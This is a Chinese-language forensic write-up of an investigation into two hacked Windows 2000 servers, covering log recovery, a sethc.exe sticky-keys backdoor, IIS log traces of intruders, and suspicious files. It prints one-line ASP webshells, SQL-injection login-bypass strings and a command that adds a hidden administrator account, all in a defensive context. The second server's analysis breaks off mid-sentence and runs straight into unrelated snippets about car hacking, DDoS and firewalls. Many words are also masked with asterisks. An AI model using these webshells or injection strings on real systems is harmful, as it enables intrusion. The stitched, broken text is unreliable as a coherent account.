隨著資訊科技的發展,越來越多的人都喜歡用計算機辦公,發郵件,建設自己的個人站點,公司建立自己的企業站點,**也逐漸的採取了網上辦公,更好的為人民服務,銀行和**機構也都開始依託網際網路來進行金融和**交易,但是隨著方便的同時也同時帶來了新的一些計算機網路安全隱患,隨著司法機關的介入,我相信在不久的將來,網路攻擊調查取證也會成為立法機構必須要考慮設立的一門新的學科,目前來說開設這個的課程多在網路警察和一些特殊機關,現在我來給大家講下我親身經歷並參與完成的一次取證過程,用事實來講述;
我一直從事病毒分析,網路攻擊響應相關的工作,這次應好朋友的邀請,幫忙配合去協查幾台伺服器,我們來到了某***駐地,首先進行例行檢查。經過了 1天左右的時間的檢查,其中用到了一些專用裝置也包含自主編寫的工具以及第三方提供的勘察取證軟體,共發現問題主機伺服器10臺,其中2臺比較嚴重,(以下用a伺服器和b伺服器來代替)和朋友商定後,決定帶回我們的實驗室,進行專項深入分析。
習慣的檢查步驟操作:
伺服器作業系統版本資訊——>作業系統補丁安裝情況——>作業系統安裝時間,中間有沒有經過進行重新安裝——>伺服器維護情況——>伺服器上面安裝的軟體版本資訊
日誌檢查——ids日誌資訊/iis日誌資訊/系統日誌資訊
****審查——是否存在一句話木馬,源**上是否存在惡意**插入
防毒軟體版本更新情況——是否是最新版本,配置的是否合理,配套的監視是否全部開啟
資料恢復——>利用專用資料恢復軟體進行資料恢復,恢復一些被刪除的日誌資訊和系統資訊,曾經安裝過的檔案操作資訊。
提取可疑檔案(病毒、木馬、後門、惡意廣告外掛程式)——在系統檔案目錄利用第三方或者自開發軟體,對可疑檔案進行提取並進行深度分析。
上述步驟是我個人總結的,有不妥的地方還請朋友們指正,介紹完理論,我們來實踐處理下這兩台伺服器。
a伺服器檢查處理過程
該a伺服器所裝的作業系統是advanced 2000 server,伺服器上安裝的有瑞星2008防毒軟體,病毒庫已經更新到最新版本。但是並沒有安裝網路防火牆和其他系統監視軟體,安裝的ftp伺服器版本為server-u 6.0(存在溢位攻擊的威脅)
一 對原始資料進行恢復
利用datarecover軟體來恢復一些被刪除的檔案,目的是希望從被刪除的檔案來找出一些木馬或者後門以及病毒。進行深度分析,把曾經做過的格式化,以及在**站中刪除過的檔案恢復過來,但是遺憾的是成功拿下這台伺服器許可權的黑客已經做了專業處理,把他的一些痕跡進行了全面清理,個人認為他使用了日本地下黑客組織開發的專項日誌清除工具,經過我和助手的共同努力還是把系統日誌恢復到當年5月份。
二 手工分析可疑檔案
在本伺服器的c盤根目錄下面有乙個sethc..exe 檔案。這個檔案是微軟自帶的,是系統粘製鍵,真實的大小應為27kb,而這個檔案為270kb,起初我以為是由於打補丁的原因。但是經過翻閱一些資料和做比對之後,才知道這樣的檔案是乙個新開發的流行後門,主要用法:通過3389終端,然後通過5次敲擊shift鍵,直接呼叫sethc.exe而直接取得系統許可權。隨後達到控制整個伺服器,通常他還是通過刪除正常的一些c盤exe檔案。然後把自己偽造成那個所刪除的exe檔名。造成一種假象。
這裡我們提供解決方法如下:個人建議這個功能實用性並不高,建議直接刪除這個檔案,如果有人利用這個手法來對你的伺服器進行入侵,那就肯定是有人做了手腳,可以第一時間發現黑客入侵行為,也可以作為取證分析的乙個思路;在控制面板的輔助功能裡面設定取消粘製鍵。
三、 利用專用防火牆檢查工具去檢視網路連線情況
目的是通過抓資料報來找出問題。如果對方安裝的有遠端控制終端,他肯定需要讓儲存在伺服器上的後門和控制終端進行通話,會有乙個會話連線。通過防火牆的攔截功能而去尋找出控制的源頭。這個上面沒有發現存在**木馬,所以沒有看到入侵的源頭。
四、檢查系統日誌
作用:檢查系統日誌是否被入侵者清除,如果日誌被入侵者刪除,需要用資料恢復軟體恢復作業系統日誌
檢查內容:主要包括iis日誌,安全性日誌,系統日誌。
更近一步深入檢查:
找到日誌後,仔細分析**是否有入侵者留下的webshell,尤其是一句話後門
還可以根據此ip位址檢索iis日誌中,此入侵者都進行過什麼樣的操作
技術點滴:如果你比較熟悉webshell,通過get操作可以知道入侵者都進行過何種操作。因為get操作是被系統記錄的。
如果入侵者裝有系統級的後門,用常用工具比如冰刃(icesword),system repair engineer (sreng)等分析出可疑檔案,用其他除錯工具分析找到入侵者控制端ip位址。
通過伺服器日誌查出隱藏在後面的幕後黑客
通過iis的log訪問日誌,排查出三個可疑目標,其中乙個手法相對於後兩個入侵者更熟練一些,他在今年5月份左右或者更早就拿到了該伺服器許可權,上來之後到是沒有做任何的新增和修改,從技術上來看,他是通過尋找**的注入點進來的,然後在上面放了不少的後門,還放了乙個mm.exe的檔案,但是因為技術問題,沒有把這個馬執行起來,從外部訪問只是在主頁上顯示為mm.jpeg,偽裝成了。但是開啟以後,什麼都沒有。經過我們分析以後,它是一張裸女的jpeg檔案。如果他這個mm.exe成功,完全有可能將該主站頁面換成一張黃色。危害還是有的。另外該站點許可權給的過高,在訪問新聞頻道的時候,直接就是sa許可權。這個是最高系統級和admin是乙個級別的。
由於伺服器被網管人員重新裝過,初步懷疑是用的ghost安裝的,造成了原珍貴日誌資料無法找回,我們只能分析出7月份-12月份這段時間的日誌,通過這些日誌我們又發現了針對此站點的入侵記錄。
入侵者操作再現:(黑客入侵操作過程分析)
2007-07-15 14:51:53 61.184.107.206 新增管理使用者 net localgroup administrator cao$ /add
2007-08-25 08:03:15 218.28.24.118 曾訪問他以前留下的運算元據庫的webshell /system/unit/main.asp 此後門可以瀏覽到敏感資料庫的資訊
2007-08-25 08:12:45 218.28.24.118 寫入另乙個webshell d:/ybcenter/gg**.asp
之後,218.28.24.118用以前留下的功能比較全的webshell /cnnsc.asp和/system/unit/cnnsc.asp頻繁操作伺服器上檔案
2007-11-11 14:23:23 218.28.24.118 用他曾經留下的運算元據庫的後門/service/asp.asp訪問敏感資料庫的資訊
2007-08-25 08:27:57 218.28.24.118 用他曾經留下的運算元據庫的後門/system/unit/sql.asp訪問敏感資料庫的資訊
2007-11-11 11:02:55 218.28.24.118 試圖訪問他曾經留下的運算元據庫的後門/yb/in_main3.asp訪問敏感資料庫
2007-08-26 07:43:47 123.5.57.117 試圖攻擊伺服器
2007-12-10 12:41:34 123.52.18.141 檢測注入
五、檢視登陸資訊 檢視是否存在有轉殖帳戶。
方法:檢查登錄檔裡面的sam檔案有沒有相同的fv,在這裡檢查過程中沒有發現存在有轉殖帳號。
六、檢視系統安裝日誌,在這裡並未發現問題。
七、 檢視iis訪問日誌,在這裡發現了攻擊者資訊。
2007-12-01 08:55:16 220.175.79.231 檢測注入
2007-12-03 18:40:48 218.28.68.126 檢測注入
2007-12-04 01:31:32 218.28.192.90 檢測注入,掃瞄web目錄
2007-12-04 23:23:33 221.5.55.76 檢測注入
2007-12-05 09:20:57 222.182.140.71 檢測注入
2007-12-08 09:39:53 218.28.220.154 檢測注入
2007-12-08 21:31:44 123.5.197.40 檢測注入
2007-12-09 05:32:14 218.28.246.10 檢測注入
2007-12-09 08:47:43 218.28.192.90 檢測注入
2007-12-09 16:50:39 61.178.89.229 檢測注入
2007-12-10 05:50:24 58.54.98.40 檢測注入
八、檢視**首頁的源**,在iframe 這個位置檢視是否有不屬於該**的**資訊。(查詢 網馬的方法),以及如何發現一些潛在的木馬和網路可利用漏洞。
下面是我們得到的一些他的網馬。
gg3.asp q:183637
log.asp
pigpot.asp
webdown.vbs
attach/a.gif
attach/chongtian.gif
attach/111.rar
system/unit/yjh.asp
system/unit/conn.asp 加入防注入
q:6242889678
images/mm.jpg = exe自解壓 主頁包含檔案
一句話木馬:<%execute request %>
備份一句話木馬 <%eval(request("a"):response.end%>
注射檢查,在iis裡面查詢是否存在的有針對 %20 and 1=1』sql
'or'='or' a'or'1=1-- ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
作用:躲避驗證資訊 主要用在後台登陸上
以上就是針對a伺服器的整個檢查過程以及發現問題後該如何處理和補救的相關解決方法。
b伺服器檢查取證分析
b伺服器裝的是windows2000 server版本,操作步驟同上。
經過一段細心的檢查還是讓我和助手們發現了乙個木馬,起因是在**源**處發現都被插入了一些奇怪的**,在system32系統資料夾下還發現了新的niu.exe,非常可疑,提取該exe檔案,在虛擬機器中進行分析,得出該exe工作原理:
德國網路安全專家提醒預防黑客入侵攻擊行車電腦
德國安聯保險團體董事會成員約阿希姆 公尺勒18日提示,如果不做好防備事情,愈來愈多的汽車行車電腦將成為黑客進擊的目的。據德新社報導,公尺勒表現,如今的汽車便是會挪動的電腦 當行車電腦連線上網際網路後,黑客只要找到沒有防護步伐的資料接進口,就能夠侵入汽車控制系統。特別較老一些的車型,行車電腦的防備步伐...
DDoS攻擊已成掩蓋真實網路攻擊的煙霧彈
近年來,隨著分布式拒絕服務 ddos 攻擊在規模 頻率以及複雜性等方面的持續上公升,讓全球眾多企業遭受到不同程度的損失。然而,通過分析安全專家們還發現,有些ddos攻擊僅僅只是網路犯罪分子為了掩蓋其真實攻擊的 煙霧彈 ddos攻擊已成掩蓋真實網路攻擊的煙霧彈 最新發布的2016年企業it安全風險調查...
網路安全的專家 防火牆!!續
主要型別 網路層防火牆 網路層防火牆可視為一種 ip 封包過濾器,運作在底層的tcp ip協議堆疊上。我們可以以列舉的方式,只允許符合特定規則的封包通過,其餘的一概禁止穿越防火牆 病毒除外,防火牆不能防止病毒侵入 這些規則通常可以經由管理員定義或修改,不過某些防火牆裝置可能只能套用內建的規則。我們也...